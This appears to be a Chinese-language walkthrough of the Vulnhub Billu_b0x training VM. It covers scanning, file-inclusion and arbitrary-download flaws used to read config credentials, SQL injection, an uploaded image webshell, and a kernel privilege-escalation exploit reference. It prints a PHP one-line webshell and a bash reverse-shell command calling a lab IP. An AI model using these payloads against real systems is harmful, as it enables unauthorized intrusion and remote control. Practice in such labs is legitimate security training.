Vulnhub靶場滲透練習(二) Billu_b0x

運行虛擬機直接上nmap掃描 獲取靶場ip

nmap 192.168.18.*

開放端口 

TCP 22 SSH OpenSSH 5.9p1

TCP 80 HTTP Apache httpd 2.2.22

192.168.18.143  打開頁面 爆破路徑 獲得

test.php、add.php、in.php、c.php、index.php、show.php等 猜想c.php 能夠有一句話 在爆破一句話

一次打開 發現 test.php

要一個file 猜想多是文件包含   輸入

成功下載文件 

in.php 是phpinfo 文件

ctril+f  搜索 SCRIPT_FILENAME   獲得跟路徑

把剛剛暴露的文件依次下載發現 c.php 裏面有鏈接mysql 的帳號密碼 在phpmyadmin 下可能存在默認配置文件

用戶名：billu密碼：b0x_billu數據庫名：ica_lab登陸

 

 在嘗試讀取phpmyadmin的默認配置文件  file=/var/www/phpmy/config.inc.php  獲得mysql root 的帳號密碼

root密碼：roottoor  既然已經獲取了 他的22端口開着能夠嘗試登陸

 登陸成功 root權限 

這裏我也能夠看到原先主頁的sql 注入 提示  下載源碼

對單引號作了轉義  這樣我想起來 一個ctf 題 也是對單引號進行轉義   直接利用 在單引號前面加個反斜槓對反斜槓進行轉義構建slq注入語句

成功注入登陸成功

進去查看頁面發現 panel.php  利用任意下載漏洞 下載 在前面源碼中也有包含 panel.php 文件的代碼

 

 代碼審計發現 文件包含 上傳一張圖片馬讓後包含

利用以前掃描出來的路徑查看  /uploaded_images/

 

讓後直接包含

這裏 能夠在  馬裏寫一個get 請求反彈shell

cmd=echo "bash -i >& /dev/tcp/192.168.64.1/4444 0>&1" | bash  cmd 後門的命令須要url 編碼

<?php system($_GET['cmd']); ?> 利用 system 函數執行系統命令

這裏也能夠利用菜刀或者蟻劍鏈接 打開蟻劍

鏈接

打開虛擬終端輸入 u'na'me -a   ‘不影響命令讀取

( www-data:/var/www) $ u'na'me -a

Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux

能夠利用linux 內核提權

https://www.exploit-db.com/exploits/37292

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation 

差很少兩種提權思路